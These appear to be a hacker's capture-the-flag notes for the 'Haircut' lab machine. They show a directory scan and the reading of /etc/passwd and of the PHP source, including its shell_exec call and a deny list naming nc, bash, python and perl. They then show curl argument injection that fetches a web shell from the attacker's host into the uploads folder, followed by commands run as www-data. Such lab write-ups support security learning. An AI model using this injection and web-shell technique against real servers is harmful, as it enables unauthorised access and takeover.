2 :80

$ gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.html           (Status: 200) [Size: 144]
/uploads              (Status: 301) [Size: 194] [--> http://10.10.10.24/uploads/]
/test.html            (Status: 200) [Size: 223]
/hair.html            (Status: 200) [Size: 141]
/exposed.php          (Status: 200) [Size: 446]

http://10.10.10.24/exposed.php
Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html 
| contains a form for input and loads the request URL

# http://localhost/../../../etc/passwd | http://localhost/../../etc/passwd
404 Not Found

# trying command injection
;ls
<> is not a good thing to put in a URL 

# blacklisted chars
;
&
|
{
}

# $ < > are not blacklisted

# program running is curl
<empty>
Requesting Site...
curl: try 'curl --help' or 'curl --manual' for more information 

# trying file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
maria:x:1000:1000:maria,,,:/home/maria:/bin/bash

file:///var/www/html/exposed.php
<span>
		<?php 
			if(isset($_POST['formurl'])){
			echo "<p>Requesting Site...</p>"; 
			$userurl=$_POST['formurl'];
			$naughtyurl=0;
			$disallowed=array('%','!','|',';','python','nc','perl','bash','&','#','{','}','[',']');
			foreach($disallowed as $naughty){
				if(strpos($userurl,$naughty) !==false){
					echo $naughty.' is not a good thing to put in a URL';
					$naughtyurl=1;
				}
			}
			if($naughtyurl==0){
				echo shell_exec("curl ".$userurl." 2>&1"); 
			}
			}
		?>
</span>

# noticing the command that is called is just curl <URL> 2>&1

trying http://10.10.16.7/web.php -o uploads/web.php

# web shell at 
http://haircut.htb/uploads/web.php

CMD: whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
haircut
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Last updated